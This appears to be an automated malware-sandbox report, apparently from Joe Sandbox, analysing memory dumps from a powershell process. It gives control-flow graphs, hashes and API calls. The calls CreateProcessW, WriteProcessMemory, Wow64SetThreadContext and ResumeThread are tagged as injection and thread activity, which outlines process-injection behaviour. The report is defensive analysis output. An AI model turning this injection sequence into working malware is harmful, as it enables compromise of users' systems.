744->745 752 2255f0 745->752 753 2255eb 745->753 754 2254f9 746->754 755 2254fe-225546 746->755 747->746 750 225725 748->750 751 22572a-22575b 748->751 749->748 750->751 758 2257bc-2257ed call 22178c 751->758 759 22575d-22576a call 221780 751->759 752->716 753->752 754->755 763 225548 755->763 764 22554d-225572 call 221774 755->764 770 225816-22581c call 221798 758->770 771 2257ef-22580b 758->771 765 22576f-22578f 759->765 763->764 773 225577-225597 764->773 768 225791-2257ad 765->768 769 2257b8-2257ba 765->769 768->769 769->770 774 225821-225841 770->774 771->770 775 2255c0 773->775 776 225599-2255b5 773->776 779 225843-22585f 774->779 780 22586a-22590d 774->780 775->740 776->775 779->780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2238f32eb5e4cb58fc774d80480da5a4b0d88e02cc08a3fdf89b657c3bd25f8f
                                                                                              • Instruction ID: a7b7684bf3d0977c306c6c76f12ad768d6f18e3827d5944c54f3ae38622632f5
                                                                                              • Opcode Fuzzy Hash: 2238f32eb5e4cb58fc774d80480da5a4b0d88e02cc08a3fdf89b657c3bd25f8f
                                                                                              • Instruction Fuzzy Hash: AD32F074D112299FEB28DF65D894BEDBBB2BB89300F5081EAD40DA7291DB305E95CF40
                                                                                              Function 007F1FCE Relevance: 6.3, Strings: 4, Instructions: 1333COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 7f1fce-7f1fd5 1 7f204a-7f204d 0->1 2 7f1fd7-7f1ff9 0->2 3 7f204f-7f2054 1->3 4 7f2065-7f2069 1->4 2->1 5 7f2059-7f2063 3->5 6 7f2055 3->6 7 7f206f-7f2073 4->7 8 7f2194-7f219e 4->8 5->4 6->5 10 7f2057 6->10 11 7f2075-7f2086 7->11 12 7f20b3 7->12 13 7f21ac-7f21b2 8->13 14 7f21a0-7f21a9 8->14 10->4 25 7f21ec-7f223b 11->25 26 7f208c-7f2091 11->26 18 7f20b5-7f20b7 12->18 15 7f21b8-7f21c4 13->15 16 7f21b4-7f21b6 13->16 20 7f21c6-7f21e9 15->20 16->20 18->8 21 7f20bd-7f20c1 18->21 21->8 24 7f20c7-7f20cb 21->24 24->8 27 7f20d1-7f20f7 24->27 36 7f243e-7f244d 25->36 37 7f2241-7f2246 25->37 29 7f20a9-7f20b1 26->29 30 7f2093-7f2099 26->30 27->8 51 7f20fd-7f2101 27->51 29->18 31 7f209d-7f20a7 30->31 32 7f209b 30->32 31->29 32->29 39 7f225e-7f2262 37->39 40 7f2248-7f224e 37->40 42 7f2268-7f226a 39->42 43 7f23e7-7f23f1 39->43 45 7f2252-7f225c 40->45 46 7f2250 40->46 47 7f226c-7f2278 42->47 48 7f227a 42->48 49 7f23fd-7f2403 43->49 50 7f23f3-7f23fa 43->50 45->39 46->39 53 7f227c-7f227e 47->53 48->53 54 7f2409-7f2415 49->54 55 7f2405-7f2407 49->55 56 7f2124 51->56 57 7f2103-7f210c 51->57 53->43 58 7f2284-7f22a3 53->58 59 7f2417-7f243b 54->59 55->59 60 7f2127-7f2134 56->60 61 7f210e-7f2111 57->61 62 7f2113-7f2120 57->62 72 7f22a5-7f22b1 58->72 73 7f22b3 58->73 65 7f213a-7f2191 60->65 64 7f2122 61->64 62->64 64->60 74 7f22b5-7f22b7 72->74 73->74 74->43 75 7f22bd-7f22c1 74->75 75->43 76 7f22c7-7f22cb 75->76 77 7f22de 76->77 78 7f22cd-7f22dc 76->78 79 7f22e0-7f22e2 77->79 78->79 79->43 80 7f22e8-7f22ec 79->80 80->43 81 7f22f2-7f2311 80->81 84 7f2329-7f2334 81->84 85 7f2313-7f2319 81->85 86 7f2336-7f2339 84->86 87 7f2343-7f235f 84->87 88 7f231d-7f231f 85->88 89 7f231b 85->89 86->87 90 7f237c-7f2386 87->90 91 7f2361-7f2374 87->91 88->84 89->84 92 7f238a-7f23d8 90->92 93 7f2388 90->93 91->90 94 7f23dd-7f23e4 92->94 93->94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373823920.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7f0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: L4#p$L4#p$L4#p$d=&
                                                                                              • API String ID: 0-3814417703
                                                                                              • Opcode ID: 9b79bdd90ef79c8ddc495369c88a550fd8eea1243aa85fa7917d3a3d772af3a9
                                                                                              • Instruction ID: af117820374c1367582075099a2689a4ce520557d7080e31803cb4ac8fcb75d8
                                                                                              • Opcode Fuzzy Hash: 9b79bdd90ef79c8ddc495369c88a550fd8eea1243aa85fa7917d3a3d772af3a9
                                                                                              • Instruction Fuzzy Hash: B6B1073170420CEFDB199F64C8507BE7BA2AF85310F14C46AEA018B392DB79DD56CB92
                                                                                              Function 007F0B98 Relevance: 3.0, Strings: 2, Instructions: 477COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 101 7f0b98-7f0bbb 102 7f0d96-7f0ddb 101->102 103 7f0bc1-7f0bc6 101->103 116 7f0f32-7f0f7e 102->116 117 7f0de1-7f0de6 102->117 104 7f0bde-7f0be2 103->104 105 7f0bc8-7f0bce 103->105 106 7f0be8-7f0bec 104->106 107 7f0d43-7f0d4d 104->107 109 7f0bd2-7f0bdc 105->109 110 7f0bd0 105->110 113 7f0bff 106->113 114 7f0bee-7f0bfd 106->114 111 7f0d4f-7f0d58 107->111 112 7f0d5b-7f0d61 107->112 109->104 110->104 119 7f0d67-7f0d73 112->119 120 7f0d63-7f0d65 112->120 121 7f0c01-7f0c03 113->121 114->121 143 7f10eb-7f111d 116->143 144 7f0f84-7f0f89 116->144 122 7f0dfe-7f0e02 117->122 123 7f0de8-7f0dee 117->123 124 7f0d75-7f0d93 119->124 120->124 121->107 125 7f0c09-7f0c29 121->125 129 7f0edf-7f0ee9 122->129 130 7f0e08-7f0e0a 122->130 126 7f0df2-7f0dfc 123->126 127 7f0df0 123->127 158 7f0c2b-7f0c46 125->158 159 7f0c48 125->159 126->122 127->122 137 7f0eeb-7f0ef4 129->137 138 7f0ef7-7f0efd 129->138 132 7f0e0c-7f0e18 130->132 133 7f0e1a 130->133 142 7f0e1c-7f0e1e 132->142 133->142 139 7f0eff-7f0f01 138->139 140 7f0f03-7f0f0f 138->140 145 7f0f11-7f0f2f 139->145 140->145 142->129 146 7f0e24-7f0e28 142->146 168 7f111f-7f112b 143->168 169 7f112d 143->169 149 7f0f8b-7f0f91 144->149 150 7f0fa1-7f0fa5 144->150 156 7f0e2a-7f0e46 146->156 157 7f0e48 146->157 151 7f0f95-7f0f9f 149->151 152 7f0f93 149->152 154 7f0fab-7f0fad 150->154 155 7f109a-7f10a4 150->155 151->150 152->150 165 7f0faf-7f0fbb 154->165 166 7f0fbd 154->166 161 7f10a6-7f10af 155->161 162 7f10b2-7f10b8 155->162 163 7f0e4a-7f0e4c 156->163 157->163 164 7f0c4a-7f0c4c 158->164 159->164 171 7f10be-7f10ca 162->171 172 7f10ba-7f10bc 162->172 163->129 174 7f0e52-7f0e65 163->174 164->107 175 7f0c52-7f0c54 164->175 176 7f0fbf-7f0fc1 165->176 166->176 170 7f112f-7f1131 168->170 169->170 179 7f117d-7f1187 170->179 180 7f1133-7f1139 170->180 181 7f10cc-7f10e8 171->181 172->181 202 7f0e6b-7f0e6d 174->202 182 7f0c56-7f0c62 175->182 183 7f0c64 175->183 176->155 184 7f0fc7-7f0fc9 176->184 195 7f1189-7f118f 179->195 196 7f1192-7f1198 179->196 188 7f113b-7f113d 180->188 189 7f1147-7f1164 180->189 192 7f0c66-7f0c68 182->192 183->192 193 7f0fcb-7f0fd7 184->193 194 7f0fd9 184->194 188->189 208 7f11ca-7f11cf 189->208 209 7f1166-7f1177 189->209 192->107 197 7f0c6e-7f0c8e 192->197 199 7f0fdb-7f0fdd 193->199 194->199 200 7f119e-7f11aa 196->200 201 7f119a-7f119c 196->201 230 7f0ca6-7f0caa 197->230 231 7f0c90-7f0c96 197->231 199->155 204 7f0fe3-7f0fe5 199->204 205 7f11ac-7f11c7 200->205 201->205 206 7f0e6f-7f0e75 202->206 207 7f0e85-7f0edc 202->207 212 7f0fff-7f1003 204->212 213 7f0fe7-7f0fed 204->213 218 7f0e79-7f0e7b 206->218 219 7f0e77 206->219 208->209 209->179 216 7f101d-7f1097 212->216 217 7f1005-7f100b 212->217 221 7f0fef 213->221 222 7f0ff1-7f0ffd 213->222 223 7f100f-7f101b 217->223 224 7f100d 217->224 218->207 219->207 221->212 222->212 223->216 224->216 232 7f0cac-7f0cb2 230->232 233 7f0cc4-7f0cc8 230->233 235 7f0c9a-7f0c9c 231->235 236 7f0c98 231->236 237 7f0cb6-7f0cc2 232->237 238 7f0cb4 232->238 240 7f0ccf-7f0cd1 233->240 235->230 236->230 237->233 238->233 243 7f0ce9-7f0d40 240->243 244 7f0cd3-7f0cd9 240->244 245 7f0cdd-7f0cdf 244->245 246 7f0cdb 244->246 245->243 246->243
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373823920.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7f0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: l;&$l;&
                                                                                              • API String ID: 0-1902425293
                                                                                              • Opcode ID: 9a053072d276cc745b998bcac93788e6cc04b90f3241cc67c98119bc254a6d5a
                                                                                              • Instruction ID: 1d21bc7d5f2c1f28fccab3a617c295c2d4823c91d879c4cd527a19c65b7c80aa
                                                                                              • Opcode Fuzzy Hash: 9a053072d276cc745b998bcac93788e6cc04b90f3241cc67c98119bc254a6d5a
                                                                                              • Instruction Fuzzy Hash: E8F11635B04309DFDB249A68C81077ABBE2AFD1311F2484BAD655DB382DB79CC45C7A2
                                                                                              Function 0022172C Relevance: 1.7, APIs: 1, Instructions: 239processCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 248 22172c-2259bb 250 2259d2-2259e0 248->250 251 2259bd-2259cf 248->251 252 2259e2-2259f4 250->252 253 2259f7-225a33 250->253 251->250 252->253 254 225a47-225b22 CreateProcessW 253->254 255 225a35-225a44 253->255 259 225b24-225b2a 254->259 260 225b2b-225bf4 254->260 255->254 259->260 269 225bf6-225c1f 260->269 270 225c2a-225c35 260->270 269->270 274 225c36 270->274 274->274
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00225B0F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 76e2ed80d7290f3831ce0b796d7bafcf1461a8cf394bd0bff59d3dc0ab2a57d6
                                                                                              • Instruction ID: cf127db5b1fdb0e0b1da1d233c1150effb574451624417d149ae41e67f9870f2
                                                                                              • Opcode Fuzzy Hash: 76e2ed80d7290f3831ce0b796d7bafcf1461a8cf394bd0bff59d3dc0ab2a57d6
                                                                                              • Instruction Fuzzy Hash: 3381CF71C0026DDFDF25DFA5D880BEDBBB1AB49304F1090AAE548B7260DB709A95CF94
                                                                                              Function 0022592E Relevance: 1.7, APIs: 1, Instructions: 236processCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 275 22592e-2259bb 276 2259d2-2259e0 275->276 277 2259bd-2259cf 275->277 278 2259e2-2259f4 276->278 279 2259f7-225a33 276->279 277->276 278->279 280 225a47-225b22 CreateProcessW 279->280 281 225a35-225a44 279->281 285 225b24-225b2a 280->285 286 225b2b-225bf4 280->286 281->280 285->286 295 225bf6-225c1f 286->295 296 225c2a-225c35 286->296 295->296 300 225c36 296->300 300->300
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00225B0F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 835769ade5201d525b58177d86bdbe98addd74bb0cebf2031e831b5e3f99c4bc
                                                                                              • Instruction ID: e25224c0fd9e23b507d0552cae4543bb8cd0e97640690ddfab2e43fa1c74e60d
                                                                                              • Opcode Fuzzy Hash: 835769ade5201d525b58177d86bdbe98addd74bb0cebf2031e831b5e3f99c4bc
                                                                                              • Instruction Fuzzy Hash: 5681DF71C0026DDFDF25CFA4D880BEDBBB1AB49304F0090AAE548B7260DB709A95CF94
                                                                                              Function 00221774 Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 301 221774-225fff 303 226001-226013 301->303 304 226016-226076 WriteProcessMemory 301->304 303->304 305 226078-22607e 304->305 306 22607f-2260bd 304->306 305->306
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00226066
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: bd634454dddebf77869f35ae1b6d0bdfc7792e2caa3b2cfd608ac6878971e0a1
                                                                                              • Instruction ID: cdd207da4f2031948be54454aa9099fd2b6deaa4810ad1be09bcc0f1955ea1c9
                                                                                              • Opcode Fuzzy Hash: bd634454dddebf77869f35ae1b6d0bdfc7792e2caa3b2cfd608ac6878971e0a1
                                                                                              • Instruction Fuzzy Hash: 664197B5D10258DFCF10CFA9D984AEEFBF1BB09310F24902AE818B7210D375AA55CB64
                                                                                              Function 00225F91 Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 309 225f91-225fff 310 226001-226013 309->310 311 226016-226076 WriteProcessMemory 309->311 310->311 312 226078-22607e 311->312 313 22607f-2260bd 311->313 312->313
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00226066
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 05ef92d0b1c9f8f3b8452d8fa7a03f1d9e2977920c0fa361d4bf7ab2cec18b2a
                                                                                              • Instruction ID: e77cb4b214401ede589df1f3edb38f534022ec63df859181999f5d7e8a2ce314
                                                                                              • Opcode Fuzzy Hash: 05ef92d0b1c9f8f3b8452d8fa7a03f1d9e2977920c0fa361d4bf7ab2cec18b2a
                                                                                              • Instruction Fuzzy Hash: 09419AB5D002589FCF01CFA9D984ADEFBF1BB4A310F24902AE818B7210D375AA45CF64
                                                                                              Function 00225C61 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 332 225c61-225cc4 333 225cc6-225cd8 332->333 334 225cdb-225d22 Wow64SetThreadContext 332->334 333->334 335 225d24-225d2a 334->335 336 225d2b-225d63 334->336 335->336
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 00225D12
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: eb57dd686f1304c8df243946f1f79f68ced75d424b446697b8767967869b8ce6
                                                                                              • Instruction ID: d96b4f17df7352c740dc651c2cded409f6d7845e28b1ad8612d25c2e9f6dc28b
                                                                                              • Opcode Fuzzy Hash: eb57dd686f1304c8df243946f1f79f68ced75d424b446697b8767967869b8ce6
                                                                                              • Instruction Fuzzy Hash: B931A9B5D012689FCB10CFA9E884ADEFBF1AB49314F24802AE419B7250D378A945CF64
                                                                                              Function 00221738 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 316 221738-225cc4 318 225cc6-225cd8 316->318 319 225cdb-225d22 Wow64SetThreadContext 316->319 318->319 320 225d24-225d2a 319->320 321 225d2b-225d63 319->321 320->321
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 00225D12
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: 91c25d917a41a705cedbcd4c3a98e3510f15e28aefd1aff5107ea263247d140b
                                                                                              • Instruction ID: b98a33e1fb1bd554bea5d5cdf7146db4ad7217ca37288392eeec03d7b375ad04
                                                                                              • Opcode Fuzzy Hash: 91c25d917a41a705cedbcd4c3a98e3510f15e28aefd1aff5107ea263247d140b
                                                                                              • Instruction Fuzzy Hash: A1319BB5D112689FCB14CFA9E584ADEFBF1EB49314F24802AE415B7310D374A945CF64
                                                                                              Function 00221780 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 324 221780-225cc4 326 225cc6-225cd8 324->326 327 225cdb-225d22 Wow64SetThreadContext 324->327 326->327 328 225d24-225d2a 327->328 329 225d2b-225d63 327->329 328->329
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 00225D12
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: c11fb490c454ea1a0f451a32765782f9845f7dc02ebd8ab9fba11a1fd700a9ca
                                                                                              • Instruction ID: a214ee9c8bbf09f231b150b9915d783e6907d6a3d4073b5834a7277e673d9e6d
                                                                                              • Opcode Fuzzy Hash: c11fb490c454ea1a0f451a32765782f9845f7dc02ebd8ab9fba11a1fd700a9ca
                                                                                              • Instruction Fuzzy Hash: 90319BB5D112689FCB14CFA9D584ADEFBF1EB49314F24802AE419B7310D374A945CF64
                                                                                              Function 002260D0 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 339 2260d0-22615e ResumeThread 340 226160-226166 339->340 341 226167-226195 339->341 340->341
                                                                                              APIs
                                                                                              • ResumeThread.KERNELBASE(?), ref: 0022614E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: e00972115977a9c609eabc1ef647de1f94cc926e7caf96a76da8364aedc1af43
                                                                                              • Instruction ID: 772d2204a316a77103795c81b230375721ee03b1bd111e3d503d0273f46f6a72
                                                                                              • Opcode Fuzzy Hash: e00972115977a9c609eabc1ef647de1f94cc926e7caf96a76da8364aedc1af43
                                                                                              • Instruction Fuzzy Hash: 69219BB9D042189FDB11CFA9D584ADEFBF0AB4A314F24905AE819B7310C374A945CF65
                                                                                              Function 00221798 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 344 221798-22615e ResumeThread 346 226160-226166 344->346 347 226167-226195 344->347 346->347
                                                                                              APIs
                                                                                              • ResumeThread.KERNELBASE(?), ref: 0022614E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: 32cc7d3ebf89e89e18b807a575fcaa2fe7016aefb91057828c5ad868e8ba1a85
                                                                                              • Instruction ID: 003f66aa28b668a603d2344f6dccc495bba40db72fd9c1d428b8dc233bb738b2
                                                                                              • Opcode Fuzzy Hash: 32cc7d3ebf89e89e18b807a575fcaa2fe7016aefb91057828c5ad868e8ba1a85
                                                                                              • Instruction Fuzzy Hash: D621ACB9D102189FCB10CFA9D484ADEFBF4EB09314F20901AE818B7310D374A955CFA5
                                                                                              Function 002261B0 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 350 2261b0-2261c1 352 2261c3-2261e1 350->352 353 226149-22615e ResumeThread 350->353 354 226160-226166 353->354 355 226167-226195 353->355 354->355
                                                                                              APIs
                                                                                              • ResumeThread.KERNELBASE(?), ref: 0022614E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: de2b90d4f2d1e8376e7a71c73b80be6103348a86fc84c424cb8d97b69faa9cb8
                                                                                              • Instruction ID: 682ca81d1524f2aaa9c7ba110183a0c9d9f47bd879090b7e31c0faa2e63ff70b
                                                                                              • Opcode Fuzzy Hash: de2b90d4f2d1e8376e7a71c73b80be6103348a86fc84c424cb8d97b69faa9cb8
                                                                                              • Instruction Fuzzy Hash: 43117C36D053459FCB02CFA8D4982DDBBF0AF4A320F154097C444E7212D6792C5ACB20
                                                                                              Function 007F203C Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 358 7f203c-7f203f 359 7f2045-7f204d 358->359 360 7f2041-7f2043 358->360 362 7f204f-7f2054 359->362 363 7f2065-7f2069 359->363 360->359 364 7f2059-7f2063 362->364 365 7f2055 362->365 366 7f206f-7f2073 363->366 367 7f2194-7f219e 363->367 364->363 365->364 368 7f2057 365->368 369 7f2075-7f2086 366->369 370 7f20b3 366->370 371 7f21ac-7f21b2 367->371 372 7f21a0-7f21a9 367->372 368->363 382 7f21ec-7f223b 369->382 383 7f208c-7f2091 369->383 376 7f20b5-7f20b7 370->376 373 7f21b8-7f21c4 371->373 374 7f21b4-7f21b6 371->374 377 7f21c6-7f21e9 373->377 374->377 376->367 378 7f20bd-7f20c1 376->378 378->367 381 7f20c7-7f20cb 378->381 381->367 384 7f20d1-7f20f7 381->384 393 7f243e-7f244d 382->393 394 7f2241-7f2246 382->394 386 7f20a9-7f20b1 383->386 387 7f2093-7f2099 383->387 384->367 408 7f20fd-7f2101 384->408 386->376 388 7f209d-7f20a7 387->388 389 7f209b 387->389 388->386 389->386 396 7f225e-7f2262 394->396 397 7f2248-7f224e 394->397 399 7f2268-7f226a 396->399 400 7f23e7-7f23f1 396->400 402 7f2252-7f225c 397->402 403 7f2250 397->403 404 7f226c-7f2278 399->404 405 7f227a 399->405 406 7f23fd-7f2403 400->406 407 7f23f3-7f23fa 400->407 402->396 403->396 410 7f227c-7f227e 404->410 405->410 411 7f2409-7f2415 406->411 412 7f2405-7f2407 406->412 413 7f2124 408->413 414 7f2103-7f210c 408->414 410->400 415 7f2284-7f22a3 410->415 416 7f2417-7f243b 411->416 412->416 417 7f2127-7f2134 413->417 418 7f210e-7f2111 414->418 419 7f2113-7f2120 414->419 429 7f22a5-7f22b1 415->429 430 7f22b3 415->430 422 7f213a-7f2191 417->422 421 7f2122 418->421 419->421 421->417 431 7f22b5-7f22b7 429->431 430->431 431->400 432 7f22bd-7f22c1 431->432 432->400 433 7f22c7-7f22cb 432->433 434 7f22de 433->434 435 7f22cd-7f22dc 433->435 436 7f22e0-7f22e2 434->436 435->436 436->400 437 7f22e8-7f22ec 436->437 437->400 438 7f22f2-7f2311 437->438 441 7f2329-7f2334 438->441 442 7f2313-7f2319 438->442 443 7f2336-7f2339 441->443 444 7f2343-7f235f 441->444 445 7f231d-7f231f 442->445 446 7f231b 442->446 443->444 447 7f237c-7f2386 444->447 448 7f2361-7f2374 444->448 445->441 446->441 449 7f238a-7f23d8 447->449 450 7f2388 447->450 448->447 451 7f23dd-7f23e4 449->451 450->451
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373823920.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7f0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: d=&
                                                                                              • API String ID: 0-142243757
                                                                                              • Opcode ID: bdfce051077339690103387c92e11f623c9f207d17f1d366ab5ab47c198c36b1
                                                                                              • Instruction ID: 7945f6246fa6aef40fe1e124a7fd0d82766c0a5db3997a28c1ae9180dd18db6f
                                                                                              • Opcode Fuzzy Hash: bdfce051077339690103387c92e11f623c9f207d17f1d366ab5ab47c198c36b1
                                                                                              • Instruction Fuzzy Hash: 40219F3170424DDBDB298F28C854BBA7B62AB45311F2484A5E7414B3D3DB78D892CB56
                                                                                              Function 007F1730 Relevance: .1, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373823920.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7f0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bf8257947c0a3eca1cf494a104061a231b52ad60ce9c1d518c72b83d6bc555a7
                                                                                              • Instruction ID: 29142095bf5d307b9b5393ec397dfa8fbc0f70b3c29c4ef61018493bd39e84ac
                                                                                              • Opcode Fuzzy Hash: bf8257947c0a3eca1cf494a104061a231b52ad60ce9c1d518c72b83d6bc555a7
                                                                                              • Instruction Fuzzy Hash: C2416835704208DBCB295E29C5106BAB7E6AF91371FA884BBDA598B341DB7CCC41C761
                                                                                              Function 0019D01D Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373593318.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
